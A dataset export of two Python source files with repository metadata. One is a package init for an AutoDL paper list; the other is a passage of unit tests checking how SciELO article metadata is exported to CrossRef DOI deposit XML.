| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
47e98cee7aa9db035f96bc26de80569af4205ace
| 275
|
py
|
Python
|
awesome_autodl/data_cls/__init__.py
|
DestinyMy/Awesome-NAS
|
723654525ba02b07d28494919c9c83edbd64964a
|
[
"MIT"
] | 1,135
|
2019-04-20T13:23:06.000Z
|
2020-07-22T14:29:06.000Z
|
awesome_autodl/data_cls/__init__.py
|
D-X-Y/awesome-AutoML
|
204cfc316b2d914b72769c59c2e7fe75d477397c
|
[
"MIT"
] | 17
|
2019-05-14T16:47:45.000Z
|
2020-07-09T23:58:33.000Z
|
awesome_autodl/data_cls/__init__.py
|
D-X-Y/awesome-AutoML
|
204cfc316b2d914b72769c59c2e7fe75d477397c
|
[
"MIT"
] | 183
|
2019-04-22T11:51:54.000Z
|
2020-07-21T11:04:35.000Z
|
#####################################################
# Copyright (c) Xuanyi Dong [GitHub D-X-Y], 2022.01 #
#####################################################
from awesome_autodl.data_cls.abbrv import BibAbbreviations
from awesome_autodl.data_cls.paper import AutoDLpaper
| 45.833333
| 58
| 0.494545
| 26
| 275
| 5.076923
| 0.769231
| 0.166667
| 0.257576
| 0.318182
| 0.363636
| 0
| 0
| 0
| 0
| 0
| 0
| 0.023438
| 0.069091
| 275
| 5
| 59
| 55
| 0.492188
| 0.178182
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
47eda9f337de3f42ee19de166b7cfcc789520eb0
| 79,862
|
py
|
Python
|
tests/test_export_crossref.py
|
robertatakenaka/articles_meta
|
75ebb158d0ca801f3495a80ec7352c8393eda541
|
[
"BSD-2-Clause"
] | 6
|
2016-01-06T09:32:00.000Z
|
2021-11-17T18:09:32.000Z
|
tests/test_export_crossref.py
|
robertatakenaka/articles_meta
|
75ebb158d0ca801f3495a80ec7352c8393eda541
|
[
"BSD-2-Clause"
] | 99
|
2015-03-31T19:27:30.000Z
|
2021-12-13T19:47:41.000Z
|
tests/test_export_crossref.py
|
robertatakenaka/articles_meta
|
75ebb158d0ca801f3495a80ec7352c8393eda541
|
[
"BSD-2-Clause"
] | 12
|
2015-10-02T15:45:57.000Z
|
2021-08-20T22:35:15.000Z
|
# coding: utf-8
import unittest
import json
import os
import io
from lxml import etree as ET
from articlemeta import export_crossref
from articlemeta import export
from articlemeta.export import CustomArticle as Article
def create_xmlcrossref_with_journal_element(journal_child_name=None):
xmlcrossref = ET.Element('doi_batch')
journal = ET.Element('journal')
if journal_child_name:
journal_child = ET.Element(journal_child_name)
journal.append(journal_child)
body = ET.Element('body')
body.append(journal)
xmlcrossref.append(body)
return xmlcrossref
def create_xmlcrossref_with_n_journal_article_element(
languages, journal_article_child_name=None):
xmlcrossref = ET.Element('doi_batch')
body = ET.Element('body')
journal = ET.Element('journal')
for lang, doi in languages:
journal_article = ET.Element('journal_article')
journal_article.set('language', lang)
journal_article.set('publication_type', 'full_text')
if journal_article_child_name:
journal_article_child = ET.Element(journal_article_child_name)
journal_article.append(journal_article_child)
journal.append(journal_article)
body.append(journal)
xmlcrossref.append(body)
return xmlcrossref
class ExportCrossRef_one_DOI_only_Tests(unittest.TestCase):
def setUp(self):
with open(
os.path.dirname(__file__)+'/fixtures/article_meta.json') as fp:
self._raw_json = json.loads(fp.read())
self._article_meta = Article(self._raw_json)
def test_doi_batch_element(self):
data = [None, None]
xmlcrossref = export_crossref.SetupDoiBatchPipe()
raw, xml = xmlcrossref.transform(data)
self.assertEqual('doi_batch', xml.tag)
def test_doi_batch_id_element(self):
xmlcrossref = ET.Element('doi_batch')
xmlcrossref.append(ET.Element('head'))
data = [self._article_meta, xmlcrossref]
xmlcrossref = export_crossref.XMLDoiBatchIDPipe()
raw, xml = xmlcrossref.transform(data)
self.assertEqual('doi_batch_id', xml.find('head/doi_batch_id').tag)
def test_depositor_element(self):
xmlcrossref = ET.Element('doi_batch')
xmlcrossref.append(ET.Element('head'))
data = [self._article_meta, xmlcrossref]
xmlcrossref = export_crossref.XMLDepositorPipe()
raw, xml = xmlcrossref.transform(data)
self.assertEqual(b'<doi_batch><head><depositor><depositor_name>depositor</depositor_name><email_address>name@domain.com</email_address></depositor></head></doi_batch>', ET.tostring(xml))
def test_registrant_element(self):
xmlcrossref = ET.Element('doi_batch')
xmlcrossref.append(ET.Element('head'))
data = [self._article_meta, xmlcrossref]
xmlcrossref = export_crossref.XMLRegistrantPipe()
raw, xml = xmlcrossref.transform(data)
self.assertEqual(b'<doi_batch><head><registrant>registrant</registrant></head></doi_batch>', ET.tostring(xml))
def test_time_stamp_element(self):
xmlcrossref = ET.Element('doi_batch')
xmlcrossref.append(ET.Element('head'))
data = [self._article_meta, xmlcrossref]
xmlcrossref = export_crossref.XMLTimeStampPipe()
raw, xml = xmlcrossref.transform(data)
self.assertEqual('timestamp', xml.find('head/timestamp').tag)
def test_head_element(self):
xmlcrossref = ET.Element('doi_batch')
data = [None, xmlcrossref]
xmlcrossref = export_crossref.XMLHeadPipe()
raw, xml = xmlcrossref.transform(data)
self.assertEqual('head', xml.find('head').tag)
def test_body_element(self):
xmlcrossref = ET.Element('doi_batch')
data = [None, xmlcrossref]
xmlcrossref = export_crossref.XMLBodyPipe()
raw, xml = xmlcrossref.transform(data)
self.assertEqual('body', xml.find('body').tag)
def test_journal_element(self):
xmlcrossref = ET.Element('doi_batch')
xmlcrossref.append(ET.Element('body'))
data = [None, xmlcrossref]
xmlcrossref = export_crossref.XMLJournalPipe()
raw, xml = xmlcrossref.transform(data)
self.assertEqual(b'<doi_batch><body><journal/></body></doi_batch>', ET.tostring(xml))
def test_journal_metadata_element(self):
xmlcrossref = ET.Element('doi_batch')
body = ET.Element('body')
body.append(ET.Element('journal'))
xmlcrossref.append(body)
data = [None, xmlcrossref]
xmlcrossref = export_crossref.XMLJournalMetadataPipe()
raw, xml = xmlcrossref.transform(data)
self.assertEqual(b'<doi_batch><body><journal><journal_metadata/></journal></body></doi_batch>', ET.tostring(xml))
def test_journal_title_element(self):
xmlcrossref = ET.Element('doi_batch')
journal = ET.Element('journal')
journal.append(ET.Element('journal_metadata'))
body = ET.Element('body')
body.append(journal)
xmlcrossref.append(body)
data = [self._article_meta, xmlcrossref]
xmlcrossref = export_crossref.XMLJournalTitlePipe()
raw, xml = xmlcrossref.transform(data)
self.assertEqual(b'<doi_batch><body><journal><journal_metadata><full_title>Revista de Saúde Pública</full_title></journal_metadata></journal></body></doi_batch>', ET.tostring(xml))
def test_abbreviated_journal_title_element(self):
xmlcrossref = ET.Element('doi_batch')
journal = ET.Element('journal')
journal.append(ET.Element('journal_metadata'))
body = ET.Element('body')
body.append(journal)
xmlcrossref.append(body)
data = [self._article_meta, xmlcrossref]
xmlcrossref = export_crossref.XMLAbbreviatedJournalTitlePipe()
raw, xml = xmlcrossref.transform(data)
self.assertEqual(b'<doi_batch><body><journal><journal_metadata><abbrev_title>Rev. Saúde Pública</abbrev_title></journal_metadata></journal></body></doi_batch>', ET.tostring(xml))
def test_journal_issn_element(self):
xmlcrossref = ET.Element('doi_batch')
journal = ET.Element('journal')
journal.append(ET.Element('journal_metadata'))
body = ET.Element('body')
body.append(journal)
xmlcrossref.append(body)
data = [self._article_meta, xmlcrossref]
xmlcrossref = export_crossref.XMLISSNPipe()
raw, xml = xmlcrossref.transform(data)
self.assertEqual(b'<doi_batch><body><journal><journal_metadata><issn media_type="print">0034-8910</issn></journal_metadata></journal></body></doi_batch>', ET.tostring(xml))
def test_journal_issue_element(self):
xmlcrossref = ET.Element('doi_batch')
body = ET.Element('body')
body.append(ET.Element('journal'))
xmlcrossref.append(body)
data = [self._article_meta, xmlcrossref]
xmlcrossref = export_crossref.XMLJournalIssuePipe()
raw, xml = xmlcrossref.transform(data)
self.assertEqual(b'<doi_batch><body><journal><journal_issue/></journal></body></doi_batch>', ET.tostring(xml))
def test_publication_date_element(self):
xmlcrossref = ET.Element('doi_batch')
journal = ET.Element('journal')
journal.append(ET.Element('journal_issue'))
body = ET.Element('body')
body.append(journal)
xmlcrossref.append(body)
data = [self._article_meta, xmlcrossref]
xmlcrossref = export_crossref.XMLPubDatePipe()
raw, xml = xmlcrossref.transform(data)
self.assertEqual(b'<doi_batch><body><journal><journal_issue><publication_date media_type="online"><month>08</month><year>2010</year></publication_date></journal_issue></journal></body></doi_batch>', ET.tostring(xml))
def test_volume_element(self):
xmlcrossref = ET.Element('doi_batch')
journal = ET.Element('journal')
journal.append(ET.Element('journal_issue'))
body = ET.Element('body')
body.append(journal)
xmlcrossref.append(body)
data = [self._article_meta, xmlcrossref]
xmlcrossref = export_crossref.XMLVolumePipe()
raw, xml = xmlcrossref.transform(data)
self.assertEqual(b'<doi_batch><body><journal><journal_issue><journal_volume><volume>44</volume></journal_volume></journal_issue></journal></body></doi_batch>', ET.tostring(xml))
def test_number_element(self):
xmlcrossref = ET.Element('doi_batch')
journal = ET.Element('journal')
journal.append(ET.Element('journal_issue'))
body = ET.Element('body')
body.append(journal)
xmlcrossref.append(body)
data = [self._article_meta, xmlcrossref]
xmlcrossref = export_crossref.XMLIssuePipe()
raw, xml = xmlcrossref.transform(data)
self.assertEqual(b'<doi_batch><body><journal><journal_issue><issue>4</issue></journal_issue></journal></body></doi_batch>', ET.tostring(xml))
def test_journal_article_element(self):
xmlcrossref = ET.Element('doi_batch')
body = ET.Element('body')
body.append(ET.Element('journal'))
xmlcrossref.append(body)
data = [self._article_meta, xmlcrossref]
xmlcrossref = export_crossref.XMLJournalArticlePipe()
raw, xml = xmlcrossref.transform(data)
self.assertEqual(b'<doi_batch><body><journal><journal_article language="pt" publication_type="full_text" reference_distribution_opts="any"/></journal></body></doi_batch>', ET.tostring(xml))
def test_article_titles_element(self):
xmlcrossref = ET.Element('doi_batch')
journal_article = ET.Element('journal_article')
journal_article.set('publication_type', 'full_text')
journal = ET.Element('journal')
journal.append(journal_article)
body = ET.Element('body')
body.append(journal)
xmlcrossref.append(body)
data = [self._article_meta, xmlcrossref]
xmlcrossref = export_crossref.XMLArticleTitlesPipe()
raw, xml = xmlcrossref.transform(data)
self.assertEqual(b'<doi_batch><body><journal><journal_article publication_type="full_text"><titles/></journal_article></journal></body></doi_batch>', ET.tostring(xml))
def test_article_title_element(self):
xmlcrossref = ET.Element('doi_batch')
titles = ET.Element('titles')
journal_article = ET.Element('journal_article')
journal_article.set('publication_type', 'full_text')
journal_article.append(titles)
journal = ET.Element('journal')
journal.append(journal_article)
body = ET.Element('body')
body.append(journal)
xmlcrossref.append(body)
data = [self._article_meta, xmlcrossref]
xmlcrossref = export_crossref.XMLArticleTitlePipe()
raw, xml = xmlcrossref.transform(data)
self.assertEqual(b'<doi_batch><body><journal><journal_article publication_type="full_text"><titles><title>Perfil epidemiológico dos pacientes em terapia renal substitutiva no Brasil, 2000-2004</title></titles></journal_article></journal></body></doi_batch>', ET.tostring(xml))
def test_article_contributors_element(self):
raw_json = self._raw_json.copy()
raw_json['article']['v10'][0]['r'] = 'ed'
raw_json['article']['v10'][1]['r'] = 'org'
raw_json['article']['v10'][2]['r'] = 'tr'
raw_json['article']['v10'][3]['r'] = 'coord'
raw_json['article']['v10'][-1]['r'] = 'inventor'
self._article_meta = Article(raw_json)
xmlcrossref = ET.Element('doi_batch')
journal_article = ET.Element('journal_article')
journal_article.set('publication_type', 'full_text')
journal = ET.Element('journal')
journal.append(journal_article)
body = ET.Element('body')
body.append(journal)
xmlcrossref.append(body)
data = [self._article_meta, xmlcrossref]
xmlcrossref = export_crossref.XMLArticleContributorsPipe()
raw, xml = xmlcrossref.transform(data)
self.assertEqual(b'<doi_batch><body><journal><journal_article publication_type="full_text"><contributors><person_name contributor_role="editor" sequence="first"><given_name>Mariangela Leal</given_name><surname>Cherchiglia</surname><affiliation>Universidade Federal de Minas Gerais, BRAZIL</affiliation></person_name><person_name contributor_role="author" sequence="additional"><given_name>Elaine Leandro</given_name><surname>Machado</surname><affiliation>Universidade Federal de Minas Gerais, BRAZIL</affiliation></person_name><person_name contributor_role="translator" sequence="additional"><given_name>Daniele Araújo Campo</given_name><surname>Szuster</surname><affiliation>Universidade Federal de Minas Gerais, BRAZIL</affiliation></person_name><person_name contributor_role="author" sequence="additional"><given_name>Eli Iola Gurgel</given_name><surname>Andrade</surname><affiliation>Universidade Federal de Minas Gerais, BRAZIL</affiliation></person_name><person_name contributor_role="author" sequence="additional"><given_name>Francisco de Assis</given_name><surname>Acúrcio</surname><affiliation>Universidade Federal de Minas Gerais, BRAZIL</affiliation></person_name><person_name contributor_role="author" sequence="additional"><given_name>Waleska Teixeira</given_name><surname>Caiaffa</surname><affiliation>Universidade Federal de Minas Gerais, BRAZIL</affiliation></person_name><person_name contributor_role="author" sequence="additional"><given_name>Ricardo</given_name><surname>Sesso</surname><affiliation>Universidade Federal de São Paulo, BRAZIL</affiliation></person_name><person_name contributor_role="author" sequence="additional"><given_name>Augusto A</given_name><surname>Guerra Junior</surname><affiliation>Universidade Federal de Minas Gerais, BRAZIL; Universidade Federal de São Paulo, BRAZIL</affiliation></person_name><person_name contributor_role="author" sequence="additional"><given_name>Odilon Vanni de</given_name><surname>Queiroz</surname><affiliation>Universidade Federal de Minas Gerais, BRAZIL</affiliation></person_name><person_name contributor_role="author" sequence="additional"><given_name>Isabel Cristina</given_name><surname>Gomes</surname><affiliation>Universidade Federal de Minas Gerais, BRAZIL</affiliation></person_name></contributors></journal_article></journal></body></doi_batch>', ET.tostring(xml))
def test_article_publication_date_element(self):
xmlcrossref = ET.Element('doi_batch')
journal_article = ET.Element('journal_article')
journal_article.set('publication_type', 'full_text')
journal = ET.Element('journal')
journal.append(journal_article)
body = ET.Element('body')
body.append(journal)
xmlcrossref.append(body)
data = [self._article_meta, xmlcrossref]
xmlcrossref = export_crossref.XMLArticlePubDatePipe()
raw, xml = xmlcrossref.transform(data)
self.assertEqual(b'<doi_batch><body><journal><journal_article publication_type="full_text"><publication_date media_type="online"><month>08</month><year>2010</year></publication_date></journal_article></journal></body></doi_batch>', ET.tostring(xml))
def test_article_pages_element(self):
self._article_meta.data['article']['v14'].pop()
xmlcrossref = ET.Element('doi_batch')
journal_article = ET.Element('journal_article')
journal_article.set('publication_type', 'full_text')
journal = ET.Element('journal')
journal.append(journal_article)
body = ET.Element('body')
body.append(journal)
xmlcrossref.append(body)
data = [self._article_meta, xmlcrossref]
xmlcrossref = export_crossref.XMLPagesPipe()
raw, xml = xmlcrossref.transform(data)
self.assertEqual(b'<doi_batch><body><journal><journal_article publication_type="full_text"><pages><first_page>639</first_page><last_page>649</last_page></pages></journal_article></journal></body></doi_batch>', ET.tostring(xml))
def test_article_pid_element(self):
xmlcrossref = ET.Element('doi_batch')
journal_article = ET.Element('journal_article')
journal_article.set('publication_type', 'full_text')
journal = ET.Element('journal')
journal.append(journal_article)
body = ET.Element('body')
body.append(journal)
xmlcrossref.append(body)
data = [self._article_meta, xmlcrossref]
xmlcrossref = export_crossref.XMLPIDPipe()
raw, xml = xmlcrossref.transform(data)
self.assertEqual(b'<doi_batch><body><journal><journal_article publication_type="full_text"><publisher_item><identifier id_type="pii">S0034-89102010000400007</identifier></publisher_item></journal_article></journal></body></doi_batch>', ET.tostring(xml))
def test_xmlclose_pipe(self):
pxml = ET.Element('doi_batch')
pxml.append(ET.Element('head'))
data = [None, pxml]
xmlarticle = export_crossref.XMLClosePipe()
xml = xmlarticle.transform(data)
self.assertEqual("<?xml version='1.0' encoding='utf-8'?>\n<doi_batch><head/></doi_batch>".encode('utf-8'), xml)
def test_validating_against_schema(self):
xml = export.Export(self._raw_json).pipeline_crossref()
xmlio = ET.parse(io.BytesIO(xml))
fp = open(os.path.dirname(__file__)+'/xsd/scielo_crossref/crossref4.4.0.xsd')
schema_root = ET.parse(fp)
schema = ET.XMLSchema(schema_root)
fp.close()
schema.assertValid(xmlio)
self.assertTrue(schema.validate(xmlio))
self.assertEqual(None, schema.assertValid(xmlio))
def test_journal_article_should_contain_item_number_with_elocation_id(self):
xmlcrossref = ET.Element("doi_batch")
publisher_item = ET.Element("publisher_item")
journal_article = ET.Element("journal_article")
journal_article.set("publication_type", "full_text")
journal_article.append(publisher_item)
journal = ET.Element("journal")
journal.append(journal_article)
body = ET.Element("body")
body.append(journal)
xmlcrossref.append(body)
data = [self._article_meta, xmlcrossref]
xmlcrossref = export_crossref.XMLElocationPipe()
_, xml = xmlcrossref.transform(data)
self.assertEqual(
b'<doi_batch><body><journal><journal_article publication_type="full_text"><publisher_item><item_number item_number_type="article_number">53</item_number></publisher_item></journal_article></journal></body></doi_batch>',
ET.tostring(xml)
)
def test_elocation_id_pipeline_should_create_publisher_item(self):
self._article_meta.data['article']['v14'].pop(0)
xmlcrossref = ET.Element("doi_batch")
journal_article = ET.Element("journal_article")
journal_article.set("publication_type", "full_text")
journal = ET.Element("journal")
journal.append(journal_article)
body = ET.Element("body")
body.append(journal)
xmlcrossref.append(body)
data = [self._article_meta, xmlcrossref]
xmlcrossref = export_crossref.XMLElocationPipe()
_, xml = xmlcrossref.transform(data)
self.assertEqual(
b'<doi_batch><body><journal><journal_article publication_type="full_text"><publisher_item><item_number item_number_type="article_number">53</item_number></publisher_item></journal_article></journal></body></doi_batch>',
ET.tostring(xml)
)
def test_journal_article_should_not_contains_publisher_item_and_item_number(self):
self._article_meta.data['article']['v14'].pop()
xmlcrossref = ET.Element("doi_batch")
journal_article = ET.Element("journal_article")
journal_article.set("publication_type", "full_text")
journal = ET.Element("journal")
journal.append(journal_article)
body = ET.Element("body")
body.append(journal)
xmlcrossref.append(body)
data = [self._article_meta, xmlcrossref]
xmlcrossref = export_crossref.XMLElocationPipe()
_, xml = xmlcrossref.transform(data)
self.assertEqual(
b'<doi_batch><body><journal><journal_article publication_type="full_text"/></journal></body></doi_batch>',
ET.tostring(xml),
)
def test_every_journal_article_must_contain_own_license(self):
self._article_meta.data["license"] = "by/4.0"
xmlcrossref = create_xmlcrossref_with_n_journal_article_element(
["pt", "en", "es"]
)
data = [self._article_meta, xmlcrossref]
xmlcrossref = export_crossref.XMLPermissionsPipe()
_, xml = xmlcrossref.transform(data)
programs = xml.findall(
".//{http://www.crossref.org/AccessIndicators.xsd}program"
)
self.assertEqual(3, len(programs))
for journal_article in xml.findall(".//journal_article"):
with self.subTest(journal_article=journal_article):
program = journal_article.findall(
".//{http://www.crossref.org/AccessIndicators.xsd}program"
)
self.assertIsNotNone(program)
self.assertEqual(1, len(program))
self.assertEqual(
3,
len(
program[0].findall(
"{http://www.crossref.org/AccessIndicators.xsd}license_ref"
)
),
)
self.assertIsNotNone(
program[0].findall(
"{http://www.crossref.org/AccessIndicators.xsd}free_to_read"
)
)
def test_journal_article_should_not_contain_licenses(self):
xmlcrossref = create_xmlcrossref_with_n_journal_article_element(
["pt", "en", "es"]
)
data = [self._article_meta, xmlcrossref]
xmlcrossref = export_crossref.XMLPermissionsPipe()
_, xml = xmlcrossref.transform(data)
programs = xml.findall(
".//{http://www.crossref.org/AccessIndicators.xsd}program"
)
self.assertIsNotNone(programs)
def test_date_pipe_should_includes_year_when_it_is_valid(self):
doi_batch = create_xmlcrossref_with_n_journal_article_element(["pt"])
self._raw_json["citations"] = [{"v65": [{"_": "20060320"}]}]
article_json = Article(self._raw_json)
data = [article_json, doi_batch]
xmlcrossref = export_crossref.XMLArticleCitationsPipe()
raw, xml = xmlcrossref.transform(data)
self.assertIsNotNone(xml.find(".//citation")) # ensure citation
expected_c_year = xml.find(".//cYear")
self.assertIsNotNone(expected_c_year)
self.assertEqual(u"2006", expected_c_year.text)
def test_date_pipe_should_not_includes_year_when_it_is_zero(self):
doi_batch = create_xmlcrossref_with_n_journal_article_element(["pt"])
self._raw_json["citations"] = [{"v65": [{"_": "0000"}]}]
article_json = Article(self._raw_json)
data = [article_json, doi_batch]
xmlcrossref = export_crossref.XMLArticleCitationsPipe()
raw, xml = xmlcrossref.transform(data)
self.assertIsNotNone(xml.find(".//citation")) # ensure citation
not_expected_c_year = xml.find(".//cYear")
self.assertIsNone(not_expected_c_year)
class ExportCrossRef_MultiLingueDoc_with_MultipleDOI_Tests(unittest.TestCase):
def setUp(self):
article_json = {
"fulltexts": {
"pdf": {
"es": "http://www.scielo.br/pdf/rsp/v44n4/es_07.pdf",
"en": "http://www.scielo.br/pdf/rsp/v44n4/en_07.pdf",
"pt": "http://www.scielo.br/pdf/rsp/v44n4/07.pdf"
},
"html": {
"es": "http://www.scielo.br/scielo.php?script=sci_arttext&pid=S0034-89102010000400007&tlng=es",
"en": "http://www.scielo.br/scielo.php?script=sci_arttext&pid=S0034-89102010000400007&tlng=en",
"pt": "http://www.scielo.br/scielo.php?script=sci_arttext&pid=S0034-89102010000400007&tlng=pt"
}
},
"collection": "scl",
"doi": "10.1590/S0034-89102010000400007",
"body": {
"pt": "Body PT",
"es": "Body ES",
"en": "Body EN"
},
"article": {
"v880": [
{
"_": "S0034-89102010000400007"
}
],
"v237": [
{
"_": "10.1590/S0034-89102010000400007"
}
],
"v223": [
{
"_": "20100801"
}
],
"v65": [
{
"_": "2010"
}
],
"v601": [
{
"_": "en"
},
{
"_": "es"
},
],
"v40": [
{
"_": "pt"
}
],
"v10": [
{
"s": "Bamgboye",
"r": "ND",
"_": "",
"n": "EL"
}
],
"v14": [
{
"f": "14",
"l": "20",
}
],
"v12": [
{
"l": "pt",
"_": "Perfil epidemiológico dos pacientes em terapia"
" renal substitutiva no Brasil, 2000-2004"
},
{
"l": "en",
"_": "Epidemiological profile of patients on"
" renal replacement therapy in Brazil, 2000-2004"
},
{
"l": "es",
"_": "Perfil epidemiológico de los pacientes en terapia"
" renal substitutiva en Brasil, 2000-2004"
}
],
"v337": [
{
"l": "pt",
"d": "10.1590/S0034-89102010000400007",
},
{
"l": "en",
"d": "10.1590/ID.en"
},
{
"l": "es",
"d": "10.1590/ID.es"
}
],
"v83": [
{
"a": "OBJETIVO: Descrever o perfil epidemiol\u00f3gico e cl\u00ednico de pacientes em terapia renal substitutiva, identificando fatores associados ao risco de morte. M\u00c9TODOS: Estudo observacional, prospectivo n\u00e3o concorrente, a partir de dados de 90.356 pacientes da Base Nacional em Terapias Renais Substitutivas, no Brasil. Foi realizado relacionamento determin\u00edstico-probabil\u00edstico do Sistema de Autoriza\u00e7\u00e3o de Procedimentos de Alta Complexidade/Custo e do Sistema de Informa\u00e7\u00e3o de Mortalidade. Foram inclu\u00eddos todos os pacientes incidentes que iniciaram di\u00e1lise entre 1/1/2000 e 31/12/2004, acompanhados at\u00e9 a morte ou final de 2004. Idade, sexo, regi\u00e3o de resid\u00eancia, doen\u00e7a renal prim\u00e1ria, causa do \u00f3bito foram analisados. Ajustou-se um modelo de riscos proporcionais para identificar fatores associados ao risco de morte. RESULTADOS: Ocorreu um aumento m\u00e9dio de 5,5% na preval\u00eancia de pacientes em terapia enquanto a incid\u00eancia manteve-se est\u00e1vel no per\u00edodo. Hemodi\u00e1lise foi a modalidade inicial predominante (89%). A maioria dos pacientes era do sexo masculino, com idade m\u00e9dia de 53 anos, residente na regi\u00e3o Sudeste, e apresentava causa indeterminada como principal causa b\u00e1sica da doen\u00e7a renal cr\u00f4nica, seguida da hipertens\u00e3o, diabetes e glomerulonefrites. Desses pacientes, 7% realizou transplante renal e 42% evoluiu para o \u00f3bito. Os pacientes em di\u00e1lise peritoneal eram mais idosos e apresentavam maior preval\u00eancia de diabetes. Entre os n\u00e3o transplantados, 45% foi a \u00f3bito e, entre os transplantados, 7%. No modelo final de riscos proporcionais de Cox, o risco de mortalidade foi associado com o aumento da idade, sexo feminino, ter diabetes, residir nas regi\u00f5es Norte e Nordeste, di\u00e1lise peritoneal como modalidade de entrada e n\u00e3o ter realizado transplante renal. CONCLUS\u00d5ES: Houve aumento da preval\u00eancia de pacientes em terapia renal no Brasil. Pacientes com idade avan\u00e7ada, diabetes, do sexo feminino, residentes nas regi\u00f5es Norte e Nordeste e sem transplante renal apresentam maior risco de morte.",
"l": "pt",
"_": ""
},
{
"a": "OBJECTIVE: To describe the clinical and epidemiological profile of patients under renal replacement therapies, identifying risk factors for death. METHODS: This is a non-concurrent cohort study of data for 90,356 patients in the National Renal Replacement Therapies Database. A deterministic-probabilistic linkage was performed using the Authorization System for High Complexity/Cost Procedures and the Mortality Information System databases. All patients who started dialysis between 1/1/2000 and 12/31/2004 were included and followed until death or the end of 2004. Age, sex, region of residence, primary renal disease and causes of death were analyzed. A proportional hazards model was used to identify factors associated with risk of death. RESULTS: The prevalence of patients under renal replacement therapies increased an average of 5.5%, while incidence remained stable during the period. Hemodialysis was the predominant initial modality (89%). The patients were majority male with mean age 53 years, residents of the Southeast region and presented unknown causes as the main cause of chronic renal disease, followed by hypertension, diabetes and glomerulonephritis. Of these patients, 42% progressed to death and 7% underwent kidney transplantation. The patients on peritoneal dialysis were older and had higher prevalence of diabetes. The death rate varied from 7% among transplanted patients to 45% among non-transplanted patients. In the final Cox proportional hazards model, the risk of mortality was associated with increasing age, female sex, having diabetes, living in the North and Northeast region, peritoneal dialysis as a first modality and not having renal transplantation. CONCLUSIONS: There was an increased prevalence of patients on renal therapy in Brazil. Increased risk of death was associated with advanced age, diabetes, the female sex, residents of the North and Northeast region and lack of renal transplant.",
"l": "en",
"_": ""
},
{
"a": "OBJETIVO: Describir el perfil epidemiol\u00f3gico y cl\u00ednico de pacientes en terapia renal substitutiva, identificando factores asociados al riesgo de muerte. M\u00c9TODOS: Estudio de observaci\u00f3n, prospectivo no concurrente, a partir de datos de 90.356 pacientes de la Base Nacional en Terapias Renales Substitutivas, en Brasil. Fue realizado reracionamiento determin\u00edstico-probabil\u00edstico del Sistema de Informaci\u00f3n de Mortalidad. Fueron incluidos todos los pacientes incidentes que iniciaron di\u00e1lisis entre 1/1/2000 y 31/12/2004, acompa\u00f1ados hasta la muerte o final de 2004. Edad, sexo, regi\u00f3n de residencia, enfermedad renal primaria, causa del \u00f3bito fueron analizados. Se ajust\u00f3 un modelo de riesgos proporcionales para identificar factores asociados al riesgo de muerte. RESULTADOS: Ocurri\u00f3 un aumento promedio de 5,5% en la prevalencia de pacientes en terapia, con relaci\u00f3n a la incidencia se mantuvo estable en el per\u00edodo. Hemodi\u00e1lisis fue la modalidad inicial predominante (89%). La mayor\u00eda de los pacientes era del sexo masculino, con edad promedio de 53 a\u00f1os, residente en la regi\u00f3n Sureste y presentaba causa indeterminada como principal causa b\u00e1sica de la enfermedad renal cr\u00f3nica, seguida de la hipertensi\u00f3n, diabetes y glomerulonefritis. De esos pacientes, 7% realizaron transplante renal y 42% evolucionaron a \u00f3bito. Los pacientes en di\u00e1lisis peritoneal eran m\u00e1s ancianos y presentaban mayor prevalencia de diabetes. Entre los no transplantados, 45% fueron a \u00f3bito y, entre los transplantadas 7%. En el modelo final de riesgos proporcionales de Cox, el riesgo de mortalidad estuvo asociado con el aumento de la edad, sexo femenino, tener diabetes, residir en la regi\u00f3n Norte y Noreste, di\u00e1lisis peritoneal como modalidad de entrada y no haber realizado transplante renal. CONCLUSIONES: Hubo aumento de la prevalencia de pacientes en terapia renal en Brasil. Pacientes con edad avanzada, diabetes, del sexo femenino, residentes en la regi\u00f3n Norte y Noreste y sin transplante renal presentan mayor riesgo de muerte.",
"l": "es",
"_": ""
}
]
},
"citations": [
{
"v30": [
{
"_": "Ethn Dis."
}
],
"v31": [
{
"_": "16"
}
],
"v32": [
{
"s": "2",
"_": "2"
}
],
"v118": [
{
"_": "1"
}
],
"v12": [
{
"l": "en",
"_": "End-stage renal disease in sub-Saharan Africa."
}
],
"v65": [
{
"_": "20060000"
}
],
"v64": [
{
"_": "2006"
}
],
"v14": [
{
"_": "2,5,9"
}
],
"v880": [
{
"_": "S0034-8910201000040000700001"
}
],
"v701": [
{
"_": "1"
}
],
"v865": [
{
"_": "20100800"
}
],
"v702": [
{
"_": "V:\\Scielo\\serial\\rsp\\v44n4\\markup\\07.htm"
}
],
"v10": [
{
"s": "Bamgboye",
"r": "ND",
"_": "",
"n": "EL"
}
]
},
],
"issue": {
"issue": {},
},
}
self._article = Article(article_json)
def test_journal_article_element(self):
xmlcrossref = ET.Element('doi_batch')
body = ET.Element('body')
body.append(ET.Element('journal'))
xmlcrossref.append(body)
data = [self._article, xmlcrossref]
xmlcrossref = export_crossref.XMLJournalArticlePipe()
raw, xml = xmlcrossref.transform(data)
langs = ['pt', 'en', 'es']
self.assertEqual(len(xml.findall('.//journal_article')), 3)
for ja, lang in zip(
xml.findall('.//journal_article'), langs):
with self.subTest(lang):
self.assertEqual(ja.get('language'), lang)
def test_article_titles_element(self):
xmlcrossref = create_xmlcrossref_with_n_journal_article_element(
['pt', 'en', 'es'])
data = [self._article, xmlcrossref]
xmlcrossref = export_crossref.XMLArticleTitlesPipe()
raw, xml = xmlcrossref.transform(data)
self.assertEqual(len(xml.findall('.//journal_article/titles')), 3)
def test_article_title_element(self):
xmlcrossref = create_xmlcrossref_with_n_journal_article_element(
['pt', 'en', 'es'], 'titles')
data = [self._article, xmlcrossref]
xmlcrossref = export_crossref.XMLArticleTitlePipe()
raw, xml = xmlcrossref.transform(data)
expected_content = [
